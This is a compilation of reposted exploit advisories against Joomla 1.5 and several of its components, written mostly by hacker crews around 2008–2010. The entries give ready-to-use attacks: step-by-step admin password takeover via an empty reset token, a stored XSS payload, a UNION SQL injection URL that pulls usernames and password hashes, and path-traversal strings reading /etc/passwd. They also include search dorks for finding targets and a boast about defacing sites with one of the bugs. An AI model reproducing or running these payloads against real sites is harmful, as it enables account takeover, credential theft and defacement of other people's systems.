Joomla 1.5.x Remote Admin Password Change
Joomla com_socialads Persistent Xss Vulnerability
Joomla com_neorecruit BSqli VulnerabilityDate : july 6,2010
Joomla Component com_jcafe local File/Path and Cookie Disclosure Vulnerability
Joomla Component com_newsfeeds SQL injection vulnerability
Joomla Component Picasa2Gallery LFI vulnerability
Joomla Component com_realtyna LFI vulnerability
Joomla JE Ajax event calendar SQL Vulnerable
- Code:
#####################################################################################
#### Joomla 1.5.x Remote Admin Password Change ####
#####################################################################################
# #
# Author: d3m0n (d3m0n@o2.pl) #
# Greets: GregStar, gorion, d3d!k #
# #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff #
# #
#####################################################################################
File : /components/com_user/controller.php
#####################################################################################
Line : 379-399
function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );
// Get the input
$token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1}
// Get the model
$model = &$this->getModel('Reset');
// Verify the token
if ($model->confirmReset($token) === false) < --- {2}
{
$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
return false;
}
$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
}
#####################################################################################
File : /components/com_user/models/reset.php
Line: 111-130
function confirmReset($token)
{
global $mainframe;
$db = &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3}
// Verify the token
if (!($id = $db->loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}
// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token', $token);
$mainframe->setUserState($this->_namespace.'id', $id);
return true;
}
#####################################################################################
{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "
Example :
1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm
2. Write into field "token" char ' and Click OK.
3. Write new password for admin
4. Go to url : target.com/administrator/
5. Login admin with new password
# milw0rm.com [2008-08-12]
Joomla com_socialads Persistent Xss Vulnerability
- Code:
1 ########################################## 10 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : Joomla com_socialads Persistent Xss Vulnerability
Date : july 3,2010
Critical Level : HIGH
vendor URL :http://techjoomla.com/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description:
With SocialAds for JomSocial, you can create Facebook like demographically targeted ads to show on Your JomSocial Site. This extension allows advertisers to create their advertisement , Target the users they want to show the advertisement to, Decide if they want to pay by impressions or per click, Pay online & get the advertisement started up right away !
#######################################################################################################
Xploit : Persistent Xss Vulnerability
Step 1: Register :D
Step 2: Goto to the option called "MANAGE YOUR ADS"
Step 3: In the ads description the attacker can post xss scripts
DEMO URL :http://server/js/index.php?option=com_socialads&view=showad&Itemid=94
Attack Pattern :">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>
Steap 4: Now check your ads :P
DEMO URL :http://server/js/index.php?option=com_socialads&view=adsummary&Itemid=94&adid=23
###############################################################################################################
# 0day no more
# Sid3^effects
Joomla com_neorecruit BSqli VulnerabilityDate : july 6,2010
- Code:
Name : Joomla com_neorecruit BSqli VulnerabilityDate : july 6,2010
Critical Level : HIGH
vendor URL :http://www.neojoomla.com
Author : Sid3^effects aKa HaRi
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description :
NeoRecruit is a recruitment component. It enables you to propose job and internship offers. The offers are classified in various categories and are allotted to a recruiter to which you can give access to the management of his offers from the website.
NeoRecruit it is not simply a system which presents offers, it makes it possible to recover the CV and the covering letters of the applicants when apply to an offer. You thus create a true CV database, manageable from the backend or the frontend for recruiters.
You can thus manage these offers for your company or to propose it to your customers or members. They will be able to propose job offers and to manage the applications from their user account.
#######################################################################################################
Xploit :BSQli Vulnerability
DEMO URL :http://server/index.php?option=com_neorecruit&task=offer_view&id=155&Itemid=[Bsqli]
###############################################################################################################
# 0day no more
# Sid3^effects
Joomla Component com_jcafe local File/Path and Cookie Disclosure Vulnerability
- Code:
# Exploit Title: Joomla Component com_jcafe local File/Path and Cookie Disclosure Vulnerability
# Date: 25/06/2010
# Author: r45c4l
# Email: r45c4l[at]hotmail[dot]com
# Site : www.garage4hackers.com
# Vendor url: http://www.joomcafe.com/
# Version: J!Cafe v1.0
# Tested on: Windows
# CVE : ()
:::::::::::::::::::::::::
:::::::::::::::::::::::::
=================Exploit======
---Indian Cyber warriors---
[ EXPL0!T ]
Local File, Path and Cookie Disclosure
p0c - http://www.site.com/index.php?option=com_jcafe&Itemid=53&task=view&prod=../../../../../../
dem0 - http://ver1.5.joomcafe.com/index.php?option=com_jcafe&Itemid=53&task=view&prod=../../../../../../
The error message will also disclose the cookies also.
===========================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0, Sandeep, Th3 RDX,
Vaibhav, All members of ICW and Hackers Garage, and all Indian Hackers
Greetz to: Lucky and Atul and team ICA
PROUD TO BE AN INDIAN
c0d3 for motherland, h4ck for motherland
Joomla Component com_newsfeeds SQL injection vulnerability
- Code:
# Title: Joomla Component com_newsfeeds SQL injection vulnerability
# EDB-ID: 12465
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Archimonde
# Published: 2010-04-30
# Verified: yes
# Download Exploit Code
# Download N/A
view source
print?
# Exploit Title: Joomla Component com_newsfeeds SQL injection vulnerability
# Date: 30/04/2010
# Author: Archimonde
# Software Link:
# Version:
# Tested on:
# CVE :
# Code :
Email : archimondera@gmail.com
Website : xgroupvn.org - programmer.vn
Code:
index.php?option=com_newsfeeds&view=categories&feedid=[sqli]
Example:
Code:
http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Joomla Component Picasa2Gallery LFI vulnerability
- Code:
[~] Joomla Component Picasa2Gallery LFI vulnerability
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 22 june, 2010
[!]===========================================================================[!]
[ Software Information ]
[+] Vendor : http://www.masselink.net
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://www.masselink.net/downloads/Software/Picasa2Gallery-1.2.8/
[+] Version : 1.2.8 or lower ;)
[!]===========================================================================[!]
[ Vulnerable File ]
http://127.0.0.1/index.php?option=com_picasa2gallery&controller=[INDONESIANCODER]
[ XpL ]
../../../../../../../../../../../../../../../etc/passwd%00
[ d3m0 ]
http://sever/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00
[!]===========================================================================[!]
[ Thx TO ]
[+] INDONESIAN CODER TEAM MainHack MAGELANG CYBER ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW IH-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack-
[+] Contrex,YadoY666,bumble_be,MarahMeraH,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-31,yur4kh4,MISTERFRIBO,GENI212
[ NOTE ]
[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
[+] Jika kami bersama Nyalakan Tanda Bahaya ;)
[+] Ayy : HappY birthday yak .. maap ketinggalan aha . . .
[+] MALANG ! kami datang ... ^^
[ QUOTE ]
[+] INDONESIANCODER still r0x
[+] nothing secure ..
Joomla Component com_realtyna LFI vulnerability
- Code:
[^] dork : inurl:"joomla"
[!]===========================================================================[!]
[ Vulnerable File ]=-
http://[localhost]/index.php?option=com_realtyna&controller=[FRIBO]
[ XpL ]=-
../../../../../../../../../../../../../../../etc/passwd%00
[!]===========================================================================[!]
[ Thx TO ]=-
[+] Indonesian Hacker Team, Arumbia, IndonesianCoder Team, Kill-9,
Yogyacarderlink, ServerIsDown
[+] tukulesto,Kamtiez,xr0b0t si om
bagus,arianom,N4CK0,Jundab,bobyhikaru,gonzhack,senot,Jack-
[+]
Contrex,YadoY666,bumble_be,MarahMeraH,Suddendeath,r4tu_l364h,IBL13Z,r3m1ck
[+] ELVIN4,Gh4mb4s,vYcOd,ayy,otong,CS-31,yur4kh4,ranggamagic
[+] v3n0m, z0mb13, setanmuda, Jali, Hmei7
[ NOTE ]=-
[+] Mrs.Fribo Jangan Marah Terus Donk. LoVe u saiiank :*
[+] eLv1n4 where are you?
[+] papi karma666 and mami winda, Selamat ya :D
[ Spoiler ]=-
[+] Indonesian Hacker Team Was Here
[+] www.fribo.tv
Joomla JE Ajax event calendar SQL Vulnerable
- Code:
########################################## 1
0 I'm L0rd CrusAd3r member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title: Joomla JE Ajax event calendar SQL Vulnerable
Version:1.0.5
Published: 2010-06-23
Greetz to:r0073r, Sid3^effects, MaYur, MA1201, Sonic Bluehat.
Special Greetz: Topsecure.net, inj3ct0r Team
Shoutzz:- To all ICW members.
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Description:
100% MVC structure follow. There are three different managers in that
component:-
1. Category Management
2. Event Management
3. Event Setting
1. Category Management: - Admin can add, edit, delete, published and unpublished the category title and description.
2. Event Management: - Admin can add, edit, delete, published and unpublished the event. Event title, category, start date, end date, description, background color and text color add, edit and delete, published, unpublished from the event management.
Admin has rights that all users or selected user or none can see the event from front end.
Admin can add event to selected category.
3. Setting: - Admin can enable or disable all the events which user can add the event or not.
Admin can set the header1, header2, header3, header4 color using color picker.
Features:-
- Add event to particular category
- Set the calendar color using color picker.
- Admin has rights to add event from site side.
- Admin has rights that all users see the event or selected user can see the events.
- Front end side user can see the event description in light box by click on that event.
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Vulnerability:
*SQL Vulnerability
DEMO URL :
http://server/component/jeeventcalendar/?view=[Sqli]
# 0day n0 m0re #
# L0rd CrusAd3r #